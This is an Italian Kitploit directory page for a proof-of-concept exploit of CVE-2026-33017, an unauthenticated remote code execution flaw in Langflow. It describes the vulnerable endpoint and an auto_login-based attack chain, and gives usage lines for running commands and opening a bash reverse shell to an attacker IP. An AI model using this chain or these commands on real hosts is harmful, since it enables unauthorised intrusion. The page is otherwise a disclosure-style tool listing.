Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-33017-Langflow-RCE-PoC — La vulnerabilità in Langflow 1.8.1 e versioni precedenti consente a un attaccante remoto non autenticato di ottenere l'esecuzione arbitraria di comandi sull'host. | Kitploit
Strumenti/GitHubGitHub/omer-efe-curkus/cve-2026-33017-langflow-rce-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubomer-efe-curkus/cve-2026-33017-langflow-rce-poc

CVE-2026-33017-Langflow-RCE-PoC

La vulnerabilità in Langflow 1.8.1 e versioni precedenti consente a un attaccante remoto non autenticato di ottenere l'esecuzione arbitraria di comandi sull'host.

Vedi Repository
15 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-33017-Langflow-RCE-PoC

La vulnerabilità in Langflow 1.8.1 e versioni precedenti consente a un attaccante remoto non autenticato di ottenere l'esecuzione arbitraria di comandi sull'host.

Descrizione

L'endpoint POST /api/v1/build_public_tmp/{flow_id}/flow consente a chiunque di creare flussi pubblici senza autenticazione.

Fornendo il parametro opzionale data, un attaccante può sovrascrivere il flusso memorizzato con una propria definizione personalizzata, incorporando codice Python arbitrario nelle configurazioni dei nodi. Questo codice controllato dall'utente viene eseguito tramite exec() senza sandboxing o validazione, portando a un'esecuzione remota di codice non autenticata.

Versioni Affette

root@kitploit:~
Langflow 1.8.1 e versioni precedenti

Funzionalità

  • Creazione di un flusso pubblico se AUTO_LOGIN=true
  • Esecuzione dell'Exploit: Esegue comandi arbitrari.
  • Reverse Shell: Avvia una reverse shell basata su bash.
  • Prerequisiti

    • L'istanza Langflow di destinazione ha almeno un flusso pubblico (comune in demo, chatbot o workflow condivisi)
    • L'UUID di un flusso pubblico (ottenibile da link/URL condivisi)
    • Non è richiesta alcuna autenticazione

    Quando AUTO_LOGIN=true (configurazione predefinita), un attaccante non autenticato può soddisfare tutte le condizioni:

    • GET /api/v1/auto_login → ottiene un token da superutente
    • POST /api/v1/flows/ → crea un flusso pubblico
    • Attiva l'exploit tramite build_public_tmp senza alcuna autenticazione

    Utilizzo

    root@kitploit:~
    python cve-2026-33017.py <host> [options]
    

    Opzioni:

    root@kitploit:~
    -p PORT, --port PORT: Porta SSH (predefinita: 7860)
    
    -id FLOW_ID, --flow_id FLOW_ID: ID del flusso pubblico (ne verrà creato uno nuovo se omesso)
    
    -c COMMAND, --command COMMAND: Comando personalizzato da eseguire
    
    --shell: Avvia una reverse shell
    
    --lhost LHOST: IP dell'attaccante per la reverse shell
    
    --lport LPORT: Porta dell'attaccante per la reverse shell (predefinita: 4444)
    
    -t TIMEOUT, --timeout TIMEOUT: Timeout di connessione in secondi (predefinito: 5)
    

    Esempi:

    Eseguire un comando:

    root@kitploit:~
    python cve-2026-33017.py 127.0.0.1 -c 'touch /tmp/pwned.txt'
    

    Avviare una reverse shell:

    root@kitploit:~
    python cve-2026-33017 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444
    

    Riferimenti

    GitHub Advisory

    NVD CVE-2026-33017

    Medium

    ⚠️ Disclaimer

    Questo PoC è solo a scopo educativo e di ricerca. Usalo a tuo rischio. L'autore non è responsabile per qualsiasi uso improprio o danno causato.

    Scarica lo strumento